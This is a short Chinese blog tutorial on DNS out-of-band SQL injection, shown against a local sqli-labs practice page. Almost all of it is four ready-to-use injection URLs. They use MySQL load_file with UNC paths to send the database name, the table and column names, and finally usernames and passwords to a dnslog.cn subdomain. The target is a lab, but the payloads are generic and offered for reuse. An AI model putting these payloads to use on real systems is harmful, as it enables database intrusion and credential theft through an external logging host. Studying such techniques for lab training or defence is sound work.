SQL注入之dns回显注入

时间:2022-07-23
本文章向大家介绍SQL注入之dns回显注入,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

DNSlog外带数据注入

用到的网站

http://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/

pyload:

查库

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\",database(),".kkc53r.dnslog.cn\xxx.txt")) --+

查表

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".kkc53r.dnslog.cn\xxx.txt")) --+

查列

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\",(select group_concat(column_name SEPARATOR'-') from information_schema.columns where table_schema='security' and table_name='users'),".kkc53r.dnslog.cn\xxx.txt")) --+

查数据(ps:子域名长度不能超过63个字符)

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\",(select concat(username,password) from users limit 0,1),".kkc53r.dnslog.cn\xxx.txt")) --+

随机文章
本站知识点必读
最近更新